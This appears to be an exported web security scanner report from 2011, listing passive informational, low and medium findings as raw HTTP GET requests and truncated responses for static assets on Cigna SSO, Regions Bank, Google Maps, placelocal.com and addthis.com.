| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA4F9C7FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/header | 
| GET /corp/sso/images/header Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:32 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "7e42fb94-3-0-48c" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4A7E0907FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/header | 
| GET /corp/sso/images/header Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:42 GMT Content-length: 1858 Content-type: image/gif Set-Cookie: TLTHID=76094A447FD11 Etag: "50bef55a-8-0-742" Last-modified: Sat, 10 Jan 2004 21:45:32 GMT Accept-ranges: bytes GIF89a..........k..7..... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/pshim | 
| GET /corp/sso/images/pshim Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:38 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "4c740010-1-0-327" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4A7FF807FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images | 
| GET /corp/sso/images Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sun, 18 Jul 2010 14:12:02 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "8bbd1376-1-0-c0f" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA13387FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/images/yahoo | 
| GET /corp/sso/images/yahoo Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Sat, 10 Jan 2004 21:45:44 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 If-None-Match: "c45c439f-1-0-65" Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:30:09 GMT Set-Cookie: TLTHID=C4AA49AC7FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/includes/portal | 
| GET /corp/sso/includes/portal Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna Cache-Control: max-age=0 If-Modified-Since: Wed, 21 Jan 2004 14:36:30 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 If-None-Match: "4ceaf758-1-0-a3d" Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 304 Use local copy Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 16:27:33 GMT Set-Cookie: TLTHID=67A13BF87FD91 Set-Cookie: TLTSID=8FB41E4C7FD11 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://sso.corp.cigna | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: sso.corp.cigna.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:46 GMT Content-length: 318 Content-type: image/x-icon Set-Cookie: TLTHID=78D4C8B67FD11 ..............(.......(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /App_Themes/2010/Ems.css | 
| GET /App_Themes/2010/Ems.css HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Type: text/css Last-Modified: Wed, 09 Mar 2011 20:07:58 GMT Accept-Ranges: bytes ETag: "02323af95decb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:01 GMT Content-Length: 21952 .../********************* /* Web Channel Services: Base /************************ .foo{} /************************ /* HTML General /************************ body, h ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 799 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT GIF89a.....`............. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Content-Length: 9597 Content-Type: image/png Last-Modified: Mon, 04 Apr 2011 20:18:00 GMT Accept-Ranges: bytes ETag: "08cb2645f3cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:21 GMT .PNG . ...IHDR...~.........D...... .J.........a..r...[.I."M. T\....a....-. ..,... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /App_Themes/2010/img | 
| GET /App_Themes/2010/img Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 9783 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:06 GMT GIF89a..^.......Y....T.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /Img/sm_558800_oo.gif | 
| GET /Img/sm_558800_oo.gif HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 597 Content-Type: image/gif Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT Accept-Ranges: bytes ETag: "08edcc72c5bcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:00 GMT GIF89a . ....fff...!..NETSCAPE2.0. .!.. ....,...... ...........s.M. .!.. ....,...... .... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /JS/cmbd-jquery.min.js | 
| GET /JS/cmbd-jquery.min.js HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 73452 Content-Type: application/x-javascript Last-Modified: Wed, 27 Apr 2011 18:41:00 GMT Accept-Ranges: bytes ETag: "04635a7a5cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:01 GMT ...//*********** jquery-1.4.2.min.js ******* (function(A,w){function ma(){if(!c.isReady){try{s ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /JS/loadMedia.min.js | 
| GET /JS/loadMedia.min.js HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Type: application/x-javascript Last-Modified: Tue, 05 Apr 2011 18:24:58 GMT Accept-Ranges: bytes ETag: "039b9c4bef3cb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:01 GMT Content-Length: 35261 ...var agt=navigator.userAgent ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 3262 Content-Type: image/x-icon Last-Modified: Tue, 21 Dec 2010 20:53:00 GMT Accept-Ranges: bytes ETag: "01e6fd51a1cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:06 GMT ...... ..............(... ...@..................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /js/_bt.js | 
| GET /js/_bt.js HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Type: application/x-javascript Last-Modified: Fri, 15 Apr 2011 14:08:58 GMT Accept-Ranges: bytes ETag: "0b994a976fbcb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:00 GMT Content-Length: 990 //if bt_test is true before executing this script the iframe will load on uat // //if bt_extra is declared as an associative array before executing this script all members of the array will be added ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /js/wtbase.js | 
| GET /js/wtbase.js HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Type: application/x-javascript Last-Modified: Fri, 15 Apr 2011 14:09:58 GMT Accept-Ranges: bytes ETag: "0ff57cd76fbcb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:02 GMT Content-Length: 13718 function DcsInit(){ this.dcsid="dcs4b71f this.domain="statse this.enabled=true; this.exre=(function(){ if (window.RegExp){ return(new RegExp( ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img2612.jpg | 
| GET /virtualMedia/img2612.jpg HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Content-Length: 38403 Content-Type: image/jpeg Last-Modified: Tue, 10 May 2011 16:53:30 GMT Accept-Ranges: bytes ETag: "e030abca32fcc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:24 GMT ......JFIF.....d.d..... . ......................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3090.jpg | 
| GET /virtualMedia/img3090.jpg HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 6969 Content-Type: image/jpeg Last-Modified: Thu, 28 Apr 2011 18:47:12 GMT Accept-Ranges: bytes ETag: "b0509dafd45cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT ......JFIF.....d.d..... .. .......................#"""#'''' . ...................................!! !!''''''''''......x.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3094.jpg | 
| GET /virtualMedia/img3094.jpg HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 19053 Content-Type: image/jpeg Last-Modified: Fri, 29 Apr 2011 12:26:29 GMT Accept-Ranges: bytes ETag: "f09e7aaa686cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT ......JFIF.....d.d..... ... . .. ......................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3107.jpg | 
| GET /virtualMedia/img3107.jpg HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 6714 Content-Type: image/jpeg Last-Modified: Fri, 29 Apr 2011 19:47:10 GMT Accept-Ranges: bytes ETag: "a0d87c3aa66cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT ......JFIF.....d.d..... .. .......................#"""#'''' . ...................................!! !!''''''''''......x.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3108.jpg | 
| GET /virtualMedia/img3108.jpg HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Content-Length: 6824 Content-Type: image/jpeg Last-Modified: Fri, 29 Apr 2011 19:47:23 GMT Accept-Ranges: bytes ETag: "60eb1a42a66cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:23 GMT ......JFIF.....d.d..... .. .......................#"""#'''' . ...................................!! !!''''''''''......x.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3132.jpg | 
| GET /virtualMedia/img3132.jpg HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 7184 Content-Type: image/jpeg Last-Modified: Wed, 04 May 2011 18:55:25 GMT Accept-Ranges: bytes ETag: "80abd2d38cacc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT ......JFIF.....d.d..... .. .......................#"""#'''' . ...................................!! !!''''''''''......x.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img506.gif | 
| GET /virtualMedia/img506.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 4606 Content-Type: image/gif Last-Modified: Wed, 26 Sep 2007 18:49:52 GMT Accept-Ranges: bytes ETag: "5032cc56e0c81:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:09 GMT GIF89a..<.........(...f. ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | http://maps.googleapis | 
| Path: | /maps/api/js/Authent | 
| GET /maps/api/js/Authent Host: maps.googleapis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com | 
| HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Mon, 16 May 2011 16:15:36 GMT Server: mafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 37 _xdc_._4yo50g && _xdc_._4yo50g( [1] ) | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | http://maps.googleapis | 
| Path: | /maps/api/js/Viewpor | 
| GET /maps/api/js/Viewpor Host: maps.googleapis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com | 
| HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Mon, 16 May 2011 16:15:39 GMT Server: mafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 2789 _xdc_._7hwynl && _xdc_._7hwynl( ["Map data ..2011 Google",[["street_view",[ ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | http://mt1.googleapis.com | 
| Path: | /mapslt/ft | 
| GET /mapslt/ft?hl=en-US&lyrs Host: mt1.googleapis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:15:41 GMT Expires: Mon, 16 May 2011 16:15:41 GMT Cache-Control: private, max-age=3600 Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Server: maptiles-versatile X-XSS-Protection: 1; mode=block Content-Length: 585 _xdc_._ap21jg && _xdc_._ap21jg([{id: ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | http://www.placelocal.com | 
| Path: | /forgot_password.php | 
| GET /forgot_password.php HTTP/1.1 Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 15:19:40 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Set-Cookie: PHPSESSID=3oik1g2sp4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: success=deleted; expires=Sun, 16-May-2010 15:19:39 GMT Set-Cookie: success_cookie_name Vary: Accept-Encoding Content-Length: 6267 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://cf.addthis.com | 
| Path: | /red/p.json | 
| GET /red/p.json?rb=0&gen=1000 Host: cf.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://s7.addthis.com Cookie: uid=4dc048d9159e4ae3; psc=2; loc=US%2CMjAwMDFOQVV | 
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Expires: Mon, 16 May 2011 17:08:13 GMT Set-Cookie: di=1305283016.1FE P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 15-Jun-2011 17:08:13 GMT; Path=/ Content-Type: text/javascript Content-Length: 161 Date: Mon, 16 May 2011 17:08:12 GMT Connection: close _ate.ad.hrr({"urls":[ | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://id.google.com | 
| Path: | /verify/EAAAALnVVncD | 
